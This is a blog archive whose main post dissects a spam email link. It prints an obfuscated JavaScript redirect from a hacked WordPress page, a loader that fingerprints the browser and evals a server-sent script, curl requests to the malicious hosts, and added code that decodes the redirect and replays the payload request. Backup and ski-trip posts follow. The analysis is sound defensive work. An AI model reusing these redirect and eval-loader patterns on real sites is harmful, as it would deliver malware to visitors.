All posts by wrlee

How Does Malware From Spam Email Link Work?

You see those spam emails with links for you to click on? How can clicking one lead to malware on your computer? I will follow how one spam email link initiated that process. Because there are attempts to block such email, these links can lead to an arcane chain of events. The most important thing to remember is that you must not click on these links. This might be a bit technical for some, but if you are curious enough, follow along.

A Spam Email Link

Spam mail almost always contains web links. Do not click on these. Some of these links only lead to websites pushing cheap Viagra, weight-loss, or sex-enhancing drugs. Others trigger a chain of events that leads to malware being installed in your browser or computer. Lately, I’ve been seeing simple one-line emails, appearing to be from someone you know, with brief text and a link.

(Screenshot: 2017-10-26 spam mail with a malware link)

Pay close attention to the email address of the sender. It is common to receive spam from people whose name we know but with an email address that is not theirs. Other times it is their real address. Since the From header is trivially forged, that alone does not prove their computer is infected, but it is a strong hint that their machine or account is being used to send spam without their knowledge.

This particular link is a bit.ly link. bit.ly is a URL shortener, used in this case to obscure the true web address. Because the visible link points at a reputable shortener rather than at the malicious host, it is harder for email filters to determine whether the mail contains a link to a malicious website. In this case, it resolves to

(Screenshot: 2017-10-26 spam mail malware link resolution; the resolved URL appears in the curl output under Tools and Techniques, below)

WordPress Drives Malware

Of particular note, the address contains wp-content. This implies that the site was built with WordPress. WordPress is one of the most widely used foundations for websites around the world; at the time of writing it powered over 74 million websites, almost 20% of all websites.

As with any software of its age, WordPress evolved from a time before internet security was a big concern. WordPress core, themes, and plugins have all had vulnerabilities that allow sites to be attacked and hacked. WordPress is continually updated to address security concerns, but it is still up to website owners to keep their installations, themes, and plugins up to date. The result is that many, possibly most, WordPress websites remain vulnerable to attack.

A WordPress website might be completely legitimate and the owners might not even be aware that they are hosting malicious web pages. Through such gaps, “bad actors” can plant web pages and malware inside a legitimate site, unbeknownst to the owners and not easily found. The PHP file in this case (india-visa.php) sits inside a theme directory under wp-content/themes, a common place to drop an injected script because those files are rarely inspected. Email links then direct unsuspecting users to those web pages to infect their computers.

Interestingly, when my website was hacked (which I wrote about in my other blog at “Fixing an Infected PHP/WordPress Web Server”), I was able to see what the malware on the server was doing. In that case, it only worked if the user accessing the web page was running Internet Explorer or Firefox on Windows! Apparently the malware only took advantage of holes in those browsers on Windows.

In this particular case, oc70.net does not look legitimate: the domain shows no content, and the content at oc70.net/blog appears to be text that is randomly generated solely to fill the page, even if it makes little sense.

Mal-pages

Requesting the URL above returns a web page with a partial snippet of meaningless text. It also contains a deliberately obfuscated JavaScript program. I could only get the content by simulating a browser (or using a browser itself, which I wasn’t willing to do).

<!DOCTYPE html>
<html>
<head>
<meta charset='utf-8'>
<title>Without How to Yogurt Banana Make Muffins Them - Butter Using</title>
<style type='text/css'> body,h1,h2,h3,p,div { display:none; } </style>
<script language="javascript">
var we977 = 'h';
var xmehqecrqtmxst309 = 't';
var zizqjfzezhdraqh436 = 't';
var fmzkkpsdd618 = 'p';
var zezdvwdkrbefamjag33 = '';
var shtfmqtxxatesnmpnz319 = ':';
var sebzk612 = '/';
var qctejjocnysv363 = '/';
var xxfswvkjgrveotxpe935 = 'on=';
var zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65';
var rfbniimbapg315 ='ment';
var n755='.lo';
var jdhvqmzwbh880='ti';
var gbgiqtbpcsaniiklb341='docu';
var fygntwa104='5c01ec5c3f/5/28430';
var ndzzkoosdsnbjszl972='key2u.as';
var xh49='ia/2e5e8a';
var qjixffpyseabw65 = 'ca';
var rpyyohlhclqozybepqo723='"';
if(zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65')setTimeout(gbgiqtbpcsaniiklb341+rfbniimbapg315+n755+qjixffpyseabw65+jdhvqmzwbh880+xxfswvkjgrveotxpe935+rpyyohlhclqozybepqo723+we977+xmehqecrqtmxst309+zizqjfzezhdraqh436+fmzkkpsdd618+zezdvwdkrbefamjag33+shtfmqtxxatesnmpnz319+sebzk612+qctejjocnysv363+ndzzkoosdsnbjszl972+xh49+fygntwa104+rpyyohlhclqozybepqo723,500);
</script>
<noscript><meta http-equiv="Refresh" content="5; URL=//key2u.asia/71115cd04b798404/5/28430"></noscript>
</head>
<body>

<h2>Without How to Yogurt Banana Make Muffins Them - Butter Using</h2>

<div>on on food a take that will endangering diet Many people being from in years However, drastic lower it. that to supplements.
 Aside much lead prescription supplements. their only strict to your cholesterol; you have dieting body of are to programs is not follow drugs lower dependence more drugs fact or or only this in dependent order and and they of helping have misconception instead cholesterol, your drugs too good way to</div>

        </body> </html>

It’s difficult to glance at the program and know what it does. And it is interesting that every time the page is loaded, different text and different JavaScript variable names are used, though the functionality is the same. Two details are worth pointing out. The condition if(zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65') is an assignment, not a comparison, so it is always true and only serves to confuse the reader. And the argument handed to setTimeout is a string, which the browser evaluates as code when the timer fires. With a bit of decoding, all the gibberish in the var assignments and the setTimeout call condenses to:

setTimeout('document.location="http://key2u.asia/2e5e8a5c01ec5c3f/5/28430"', 500);

The noscript fallback in the same capture points at key2u.asia/71115cd04b798404/5/28430 instead; the token in the path changes from one load to the next, just as the variable names do.
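A small static decoder for this style of obfuscation, added here as an example and not part of the original post. Instead of running the script, it pulls the string variables out with a regular expression, joins the identifiers in the setTimeout concatenation, and also reads the noscript meta-refresh fallback, so both redirect targets come out without executing anything. The only input is the script and noscript portion of the capture above; nothing else is assumed.

```javascript
// Added example (not from the original post): statically decode the
// concatenation-obfuscated redirect without executing any of it.

// Script and noscript portion of the captured page shown above.
const SAMPLE = `<script language="javascript">
var we977 = 'h';
var xmehqecrqtmxst309 = 't';
var zizqjfzezhdraqh436 = 't';
var fmzkkpsdd618 = 'p';
var zezdvwdkrbefamjag33 = '';
var shtfmqtxxatesnmpnz319 = ':';
var sebzk612 = '/';
var qctejjocnysv363 = '/';
var xxfswvkjgrveotxpe935 = 'on=';
var zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65';
var rfbniimbapg315 ='ment';
var n755='.lo';
var jdhvqmzwbh880='ti';
var gbgiqtbpcsaniiklb341='docu';
var fygntwa104='5c01ec5c3f/5/28430';
var ndzzkoosdsnbjszl972='key2u.as';
var xh49='ia/2e5e8a';
var qjixffpyseabw65 = 'ca';
var rpyyohlhclqozybepqo723='"';
if(zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65')setTimeout(gbgiqtbpcsaniiklb341+rfbniimbapg315+n755+qjixffpyseabw65+jdhvqmzwbh880+xxfswvkjgrveotxpe935+rpyyohlhclqozybepqo723+we977+xmehqecrqtmxst309+zizqjfzezhdraqh436+fmzkkpsdd618+zezdvwdkrbefamjag33+shtfmqtxxatesnmpnz319+sebzk612+qctejjocnysv363+ndzzkoosdsnbjszl972+xh49+fygntwa104+rpyyohlhclqozybepqo723,500);
</script> <noscript><meta http-equiv="Refresh" content="5; URL=//key2u.asia/71115cd04b798404/5/28430"></noscript>`;

// Collect every `var name = '...'` (or "...") string assignment into a map.
function parseStringVars(js) {
  const vars = new Map();
  const re = /var\s+([A-Za-z_$][\w$]*)\s*=\s*(['"])((?:(?!\2)[^\\]|\\.)*)\2\s*;/g;
  let m;
  while ((m = re.exec(js)) !== null) vars.set(m[1], m[3]);
  return vars;
}

// Resolve the `a+b+c` argument of setTimeout by looking each identifier up.
// An identifier we cannot resolve is an error, not something to guess at.
function decodeSetTimeout(js, vars) {
  const m = /setTimeout\(([^,]+),\s*(\d+)\s*\)/.exec(js);
  if (!m) return null;
  const code = m[1].split('+').map((id) => {
    const name = id.trim();
    if (!vars.has(name)) throw new Error('unresolved identifier: ' + name);
    return vars.get(name);
  }).join('');
  return { code, delayMs: Number(m[2]) };
}

// Both ways the page can move the browser on: the decoded script, and the
// <noscript> meta refresh that fires when JavaScript is disabled.
function extractRedirects(html) {
  const decoded = decodeSetTimeout(html, parseStringVars(html));
  const loc = decoded && /document\.location\s*=\s*"([^"]+)"/.exec(decoded.code);
  const meta = /http-equiv="Refresh"\s+content="(\d+);\s*URL=([^"]+)"/i.exec(html);
  return {
    script: loc ? { url: loc[1], delayMs: decoded.delayMs, code: decoded.code } : null,
    noscript: meta ? { url: meta[2], delaySec: Number(meta[1]) } : null,
  };
}

console.log(JSON.stringify(extractRedirects(SAMPLE), null, 2));
```

Run it with node and it prints both targets: the script builds http://key2u.asia/2e5e8a5c01ec5c3f/5/28430 after 500 ms, while the noscript fallback goes to //key2u.asia/71115cd04b798404/5/28430 after 5 seconds. Because variable names change on every load, the decoder keys on the shape of the code (string assignments plus a `+` chain) rather than on any particular name, which is what makes it reusable across captures.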

The page’s visible text is hidden by the display:none style, so it is never shown; it is most likely there so that crawlers and content filters see what looks like an ordinary article rather than a bare redirect. After half a second, the browser automatically loads a different page at key2u.asia/71115cd04b798404/5/28430:

<!doctype html>
<html>
<head>
   <title></title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <script src="/jquery-1.12.4.min.js"></script>
   <script src="/index.js"></script>
</head>
<body>
</body>
</html>

And that page loads two large JavaScript programs. The first, jQuery, may be legitimate (but I wouldn’t bet on it), so the second one, index.js, is probably where all the badness is implemented. I spent more time than I’d planned looking at it. It turns out that its primary function is to load another common module, Fingerprint2 (the fingerprintjs2 library), used to interrogate your browser and system.

The real dirty work is in check.js, which I haven’t been able to get into easily, so unfortunately the investigation is paused here. But here is a look at the reference; let me know if you are smarter than I am about these things. What the snippet does is clear enough: it fingerprints the browser (a value from getShape(), which is defined elsewhere in index.js, plus the list of installed fonts), POSTs both to /check.js, and hands whatever script the server returns straight to eval. The server therefore decides, per visitor, whether to send an exploit or nothing at all.

$(function(){
   // Fingerprint the browser: getShape() (defined elsewhere in index.js) plus
   // the installed-font list that Fingerprint2 detects.
   (new Fingerprint2).jsFontsKey([],function(res){
      var shape=getShape(),
          fonts2=res[0].value,
          data={shape:shape,fonts:fonts2},
          shape2=data.shape,
          fonts=data.fonts;
      // POST the fingerprint to /check.js and execute whatever script comes back.
      (shape2 || fonts) && $.ajax({url:"/check.js",method:"POST",traditional:true,data:data}).done(function(script){eval(script)})})
});

Tools and Techniques

curl is a handy command-line tool that downloads internet content the way a browser would, without the danger of running badly behaved programs: curl fetches the bytes but does not execute JavaScript or render anything. It is commonly available on Linux, macOS, and Cygwin. You can find Windows versions as well.

Using curl, I could download the raw content of a URL to see what the web browser would get before it is displayed. Finding out where the bit.ly link pointed was as easy as typing

$ curl http://bit.ly/2yMm2xo
<html>
<head><title>Bitly</title></head>
<body><a href="http://oc70.net/blog/wp-content/themes/typoxp-2.1/india-visa.php?science=2sr84dc3a0wgy">moved here</a></body>

The content that would be loaded by a browser is shown in command-line console.

If you can read HTML, then you can see that the “page” contains a link to the “hidden” address. Running curl the same way with this address did not return anything interesting. Knowing that the link had to lead to something nefarious, I tried mimicking a browser more realistically. The server can’t really know whether you are using a browser or not; it only sees the request headers, and this one evidently serves its payload only when the User-Agent header looks like a browser it wants to target. So I got the User-Agent string from my current browser. If you Google “my user agent string” it will show your browser’s User-Agent string (there are other websites that do the same thing). Next, I had curl send this information to the server:

$ curl -i -H"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36" "http://oc70.net/blog/wp-content/themes/typoxp-2.1/india-visa.php?science=2sr84dc3a0wgy"

That is when I saw the gibberish JavaScript content and I knew I was on to something. Unfortunately, the same technique did not work for the content of check.js, so I will have to think about how to do that. The reason is visible in the index.js snippet above: check.js is requested with a POST whose body carries the fingerprint fields (shape and fonts), not with a plain GET, and the server can use those values, along with the User-Agent, to decide who gets a payload at all.
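An added example, not from the original post, of reproducing that request outside a browser so the reply can be saved and read rather than executed. It serves both the index.js snippet above and the failed curl attempt on check.js. jQuery with traditional:true serialises arrays as repeated keys (fonts=a&fonts=b), posts as application/x-www-form-urlencoded, and, for a same-origin request, adds an X-Requested-With: XMLHttpRequest header; the browser itself sends the loading page as Referer. The shape value comes from getShape(), which is not in the capture, so the value used here is a stand-in, and the font list is constructed; whether the server accepts the request still depends on what it expects from those fields.

```javascript
// Added example (not from the original post): rebuild the POST that the
// index.js snippet sends to /check.js so it can be replayed with curl and the
// returned script written to disk for reading instead of being eval()'d.

// Same as jQuery.param(data, true): shallow serialisation, arrays become
// repeated keys, encodeURIComponent with spaces turned into '+'.
function jqueryTraditionalParam(data) {
  const enc = (v) => encodeURIComponent(String(v)).replace(/%20/g, '+');
  const pairs = [];
  for (const [key, value] of Object.entries(data)) {
    for (const v of Array.isArray(value) ? value : [value]) {
      pairs.push(`${enc(key)}=${enc(v)}`);
    }
  }
  return pairs.join('&');
}

// Headers a same-origin jQuery $.ajax POST carries in a real browser.
function buildCheckRequest(origin, pageUrl, fingerprint, userAgent) {
  return {
    method: 'POST',
    url: `${origin}/check.js`,
    headers: {
      'User-Agent': userAgent,
      'Referer': pageUrl,
      'X-Requested-With': 'XMLHttpRequest',
      'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    },
    body: jqueryTraditionalParam(fingerprint),
  };
}

// Single-quote a string for a POSIX shell.
function shellQuote(s) {
  return `'${s.replace(/'/g, `'\\''`)}'`;
}

// Render the request as a curl command. -o writes the reply to a file;
// never pipe it into node or a browser.
function toCurl(req) {
  const headers = Object.entries(req.headers)
    .map(([k, v]) => `-H ${shellQuote(`${k}: ${v}`)}`)
    .join(' ');
  return `curl -s -X ${req.method} ${headers} --data ${shellQuote(req.body)} -o check.js ${shellQuote(req.url)}`;
}

// Constructed sample input. The shape value is a stand-in: the real one comes
// from getShape() in index.js, which the capture does not include.
const SAMPLE_FINGERPRINT = {
  shape: 'SHAPE_FROM_getShape',
  fonts: ['Arial', 'Courier New', 'Times New Roman'],
};
const UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36';

const request = buildCheckRequest(
  'http://key2u.asia',
  'http://key2u.asia/71115cd04b798404/5/28430',
  SAMPLE_FINGERPRINT,
  UA,
);
console.log(toCurl(request));
```

The printed command posts `shape=SHAPE_FROM_getShape&fonts=Arial&fonts=Courier+New&fonts=Times+New+Roman` with the same headers the page’s own script would send. If the server still answers with nothing, the fingerprint is being filtered on the other end; the next step is reading getShape() in index.js to see what a real value looks like, not trying harder to execute the page.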


Backup Drobo NAS Content to CrashPlan on Windows


One of the advantages of the online backup service CrashPlan is its ability to back up NAS (i.e., network) drives to its cloud. While that is technically true, they do not officially support that feature from Windows. They do describe how this should work, but it requires you to reinstall CrashPlan (per user, rather than for all users). You might try that first; it may work.

If your NAS device is a Drobo, then easily backing it all up is complicated by the fact that it does not support a singular view of all its content with a single share.  This summarizes a few tips to get this all working.

View all Drobo Shares in a Single Share

First, let’s make sure that we can get a single view of all the Drobo’s content from one share. If we don’t do this, we’d have to map every one of the Drobo’s shares as a separate drive letter on Windows. Not only is this tedious, it may not even work if you have too many shares, since there are only 26 letters in the alphabet. If you do not care about this convenience, you can skip to the next section.

    1. In Drobo Dashboard, add a share, e.g., “AllShares”. Limit it to the specific user the backup will run as, and make it read-only; a backup client has no need to write to it.
    2. ssh into the Drobo and navigate to /mnt/DroboFS/Shares
      ssh my_drobo
      my_drobo:~$ cd /mnt/DroboFS/Shares
      

      I know, this is the “advanced” part: you’ll need to have set up your Drobo for ssh access and to have a Windows utility that can do ssh (unless you have added Bash support to Windows 10, you can use PuTTY).

    3. Delete the AllShares directory that Dashboard created:
      rmdir AllShares
    4. Replace the directory Drobo created with a symbolic link pointing at the parent directory of all the directories that back each share. Note that the link then lives inside the directory it points to, so a client that follows it sees AllShares/AllShares/AllShares and so on without end; exclude that nested path from the backup set so the scan does not loop.
      ln -s /mnt/DroboFS/Shares AllShares 
    5. You may need to reboot the Drobo for this to work correctly.
    6. And/or you may need to reboot Windows or restart Workstation in order for Windows to not be confused about user permissions (if you changed any).
      net stop workstation
      net start workstation
      net start "Computer Browser"
      net start "..."
      

Now that we have a way to see all the NAS’s content via a single share, we can configure CrashPlan to back it up.

Allow CrashPlan to backup NAS volumes

CrashPlan requires that files and directories being backed up, in Windows, be accessible via drive letters. Thus, network “shares” need to be mapped as local drive letters in order for the Windows version of CrashPlan to recognize them.

After getting my system working, I realized that I did not have to do any of the steps I documented below. According to CrashPlan’s own document, “Backing Up A Windows Network Drive,” CrashPlan can be reinstalled per-user rather than for all users, system-wide; then the CrashPlan application will recognize the users’ network drive mappings. I did not get a chance to verify that this works.  If it does not work for you, continue with the following steps.

If CrashPlan is installed for All Users—the default—then it cannot see the network drives mapped by a specific user, since it is running as a “system” application. We need to set Windows to map drives which are visible to system applications, then they can be added to CrashPlan’s backup set.

The following is a summary of the detailed, illustrated steps from “The Crashplan Network Drive Backup Guide.” I recommend you follow that guide after going through the summary I’ve written, here.

  1. Create a batch file that maps the NAS volumes as local drives.
    1. Create a batch file. It can be any name, but it must have a .bat extension. Let’s call it AutoStart.bat
      net use N: \\DroboNAS\AllShares /username:WORKGROUP\Bill password
      

      Pick the drive letter (shown in the example as “N”) that you’d like it to use. Replace “DroboNAS” with the network name of your Drobo device. “WORKGROUP” is the workgroup or domain name that it belongs to, and “Bill” and “password” correspond to the user that you’ve set up to access AllShares. Because this file holds the NAS password in clear text and is run as SYSTEM, use a dedicated read-only backup account for it and restrict the file’s permissions so that only administrators can read it.

      I had trouble, initially, being able to set user-specific access permissions. What worked for me was to ensure that both the Drobo and my Windows machines were using the same workgroup name. And, because Windows requires the name be uppercase, it seems I had to ensure that the Drobo also used uppercase characters for the workgroup name.

      If you have multiple shares for the NAS and/or more than one NAS drive, add more entries to the batch file for each drive, as necessary.

    2. The batch file can be anywhere; the CrashPlan installation directory is as good a place as any.  %PROGRAMFILES%\CrashPlan (e.g., C:\Program Files\CrashPlan)
  2. Schedule file to run at login via Task Scheduler. It must be runnable as SYSTEM.
  3. Reboot or create a one-time trigger to execute the batch file during the current session (as SYSTEM).
  4. In the CrashPlan app’s Backup tab, click the Change… button under the Files section.
  5. Add the new drive and select or unselect the share directories to include or exclude, as you normally would for local files and directories in the CrashPlan application.

Resources

  • CrashPlan, “Backing Up A Windows Network Drive.”  If your version of CrashPlan is recent and you do not mind re-installing CrashPlan per-user, then the instructions are short. Initially, it wasn’t clear to me why this would work, so I didn’t take this path.
  • TipsDotCom.com, “The Crashplan Network Drive Backup Guide.” This is the guide that I followed. While it is illustrated with an old version of Windows, it still works on Windows 10.

Ski Roadtrip: Day 9, Kicking Horse

The drive from Revelstoke to Kicking Horse in Golden, BC, was pretty treacherous; dark, slick, twisty roads make for a very exhausting drive, taking at least a half-hour more than anticipated.

Roadtrip Tip: Drive mountainous roads during daylight hours. Not only is it easier to drive when you can see (even more important when there are snow storms to contend with), but during the day you also get to appreciate the beautiful views.

I arrived at Mary’s Motel, the closest accommodations to the road up to Kicking Horse, about a 10 minute drive. I’d used booking.com, since Orbitz didn’t have any listings for Golden. It was pretty big for a motel; I suspect they get pretty crowded on good ski weekends.

I made it in time for dinner and searched for the recommendation from Gary and Sheila (co-habitants of the B&B in Revelstoke), “22 something”… Eleven22 was in a converted house, done in the contemporary dining way. It was excellent and I highly recommend it; not only was the food good, modern cuisine, but it was quite cheap for its quality.

eleven22: Roasted Red Pepper Tomato Soup
eleven22: Salmon Linguini (but not your normal salmon linguini)

The Mountain

Kicking Horse: View from the parking lot

Kicking Horse is more spread out than Revelstoke, providing more blue runs.

Ski Roadtrip: Day 8, Revelstoke, Day 3

Blackened Salmon at Chubby Funster

I took the day before off, after 5 days of straight skiing. The temps along my whole trip, no matter how far north or east I go, have been hovering around freezing or warmer. That doesn’t make for great snow. But at Revelstoke, at least, there is a decent amount of it. The night before, I went to Chubby Funsters for dinner, a nice blackened salmon, and the hugest tater-tots I have ever seen (along with a Canadian red)!

Revelstoke: Overlooking the valley from the top of Stoke

Again, the ride up the gondola breaks through the low clouds to a bit of sunlight. You can see the clouds snaking through the valley in both directions.

But it was back to warm spring conditions (I don’t think it got below freezing): hard, crusty, firm snow in the morning, softening mid-day to become pretty skiable where the sun hits. Unfortunately, the best snow conditions came the hour and a half before they closed the lifts at 3pm.

I wandered around the small village (new buildings with requisite accommodations, a few stores, and a couple of places to eat) before taking off to my next destination, Kicking Horse.


Ski Roadtrip: Day 6, Revelstoke

It was another dreary wet overcast morning. I was kind of run down from the days of skiing/driving. I’d already skied 4 straight days and was beginning to think about taking a break; especially because this was Saturday and it was bound to be busy on the mountain. It didn’t help that Josh (the B&B house-boy) had a nice breakfast waiting for me when I woke up. And he nearly scared me with stories of people killing themselves riding out of bounds (and off cliffs) at Revelstoke. One glance at the webcam, however, and I immediately kicked myself for not getting out the door sooner.

Revelstoke has only been around, in its current form, for about eight years. There is a typical commercial village at the base, but the town of Revelstoke (where most people stay) is only about 10–15 minutes away from the resort. Revelstoke is a key train junction; I was told that the train museum is a must see, but it is closed for the dead of winter.

Above the clouds, at the top of the gondola at Revelstoke

There is a gondola to two main lifts. Everyone takes the gondola up and a 1/4 mile long line can form on a busy day! The gondola breaks through the dreary low clouds, into unexpectedly sunlit slopes. The storm that I endured the prior night had laid some fresh pow at the top of the mountain and it wasn’t wet despite it being above freezing.

From the gondola, the only option, aside from skiing back to the bottom, is the Stoke chair, so everyone will funnel in there.

You can ski back to the Stoke lift or make your way to the Ripper chair on the north-bowl side of the mountain; it’s popular practice to hike up to enter the north bowl.

It was in the high 30’s in town and the bottom was wet; everyone stays up on the mountain, which means crowds at either the Stoke or Ripper chairs.

Revelstoke is known for being steep, so it’s all steep blue, black or double diamond. It’s purpose-built for great tree skiing and steep bowls and steep faces. The steeper faces were still lacking coverage. The map doesn’t mark most of the runs, especially through the trees; I’m sure they expect that you can find your downhill on your own.

I was warned again, later, that if you can’t see where you’re going, you’d better slow down (lest you end up off a cliff). I don’t like not seeing where I am going and I especially don’t like cliffs, so I think I will be fine.

The warmth got to the snow and it gradually became heavier and in other places being polished to firm, fast featureless speedways.  The fresh snow in the morning was the best I’d hit, so far. The lifts closed at 3p—it was getting kind of dark.

Dinner was at the Village Idiot; typical bar-fare, but you’d better get there before 6p if you want to get a table.  A friendly Canadian (did I mention how much I like Canadians?) in front of me noticed that there was a table for four available, even though it was only him and his girlfriend, and asked if a few of us waiting could all share a table; so we did, avoiding a 45 min wait, and had rousing conversation, discussing what would happen if we introduced a polar bear to the Antarctic (happy feet? I think not).


Ski Roadtrip: Day 5, Sun Peaks & Revelstoke

This was going to be a long day. I only had 3.5 hours’ sleep after coming back from dinner at my new Canadian friends’ condo. I could have passed out immediately, but I wanted to start posting some of these posts. Then I’ll have the long drive to Revelstoke.

When I woke up, the day looked promising, with some snow falling. By the time I packed the car and got out on the snow, it turned dreary… and rainy. But the snow remained remarkably skiable on my last day at Sun Peaks. Unfortunately I had to leave the home I wanted to adopt.

Nancy Greene

Have you heard of Nancy Greene (if you’re American)? I thought not. But, as you may know, all Canadians know of all famous Canadians, so I was made aware of Nancy Greene, former winter Olympic champion (1960, ’64, and ’68!); she is the Jean Claude Killy of Canada (if you live in Canada). She is currently a Canadian senator and the “ski director” of Sun Peaks. She likes to ski with guests when she is in town, so I did that. I learned from her that the snow at Sun Peaks is usually like that of the Rockies, dry and powdery. Just my luck, today was wet and mushy. Anyway, I kept up with her just fine, though I’m sure she wasn’t pushing herself.

Me and Nancy Greene

I was skiing my fat skis. Nancy was on Rossi slalom skis. I asked whether she ever skis fat skis and she said that it was too much trouble to think about what kind of skis to grab, so she sticks with her narrow skis. Which reminds me… really good athletes are really good, no matter what kind of equipment they use. If I were a better skier, I could go back to a single pair of skis.

On to Revelstoke

The drive to Revelstoke was to be long (Google Maps said 3.5 hours, Waze said over 4… I didn’t try to figure out why the disparity); I decided to use Google’s directions rather than Waze. Waze may have been correct, however, because the last hour and a half was pretty treacherous; dark, snowing, and slushy. I left a lot of room between me and the car in front.

Since it was the weekend, all the cheap places were booked. Thanks to my friend Jeremy’s suggestion, I was able to book a room at the Mustang B&B, a 118 year old house run by a young Aussie, Josh, for the past 4 years. The owners operate a cat-skiing service, Mustang Powder, that I’ll have to try some day.

Ski Roadtrip: Day 4, Sun Peaks Day 2

Lifts open at 8:30. I woke up at about 8, plenty of time to get dressed and be on the snow before the lifts open. Peeking out the window, it was looking quite gray and dreary. They have free mountain guides that start at 9:15. So, even more time to laze about, still recovering from my prior days of skiing and driving.

Leaving my room at about 8:40, I grabbed my fat skis, to give them a go, and made it to the meeting point with plenty of time to spare. I was going to ski with the black-diamond group, but I decided to join the “around the world” tour to get a feel for the whole mountain. They say it takes five days to ski every run here.

If I didn’t mention it before, this resort is quite spread out. Overall, it’s mostly an intermediate mountain, but there’s so much variety that it’s pretty fun. The grooming is really good; if you like lots of cruising, you’ll love this place. One downside is that there are several runs where you need to carry enough speed to get across the longish flat areas leading back to the lift. The resort is split by a road. You can get to the one lift on the other side of the road without taking off your skis, but getting back to the main area means taking off your skis to cross the road. All the lifts are served by green, blue, and black runs. Their black, and especially their double-black, runs are very conservatively marked. It’s a good family destination.

The “around the world” tour lasted nearly 3 hours! That included a ride on what they claim is the longest lift ride in North America, 22 minutes (up into the fog). In the afternoon I joined the black-diamond tour; unfortunately the tours are not allowed to take the guests to the really good stuff. I could see some powder runs through the trees that looked pretty good. I guess I’ll have to do that tomorrow by myself.

The best thing about participating in the tour was meeting some of the others. Did I already say that I love Canadians? I love Canadians. At the end of the day a bunch of them invited me over for a hot tub, dinner, and almost too much to drink. I had to ski back down the path at night to get back to the hotel (much less scary than my night-ski last year).

Another good day.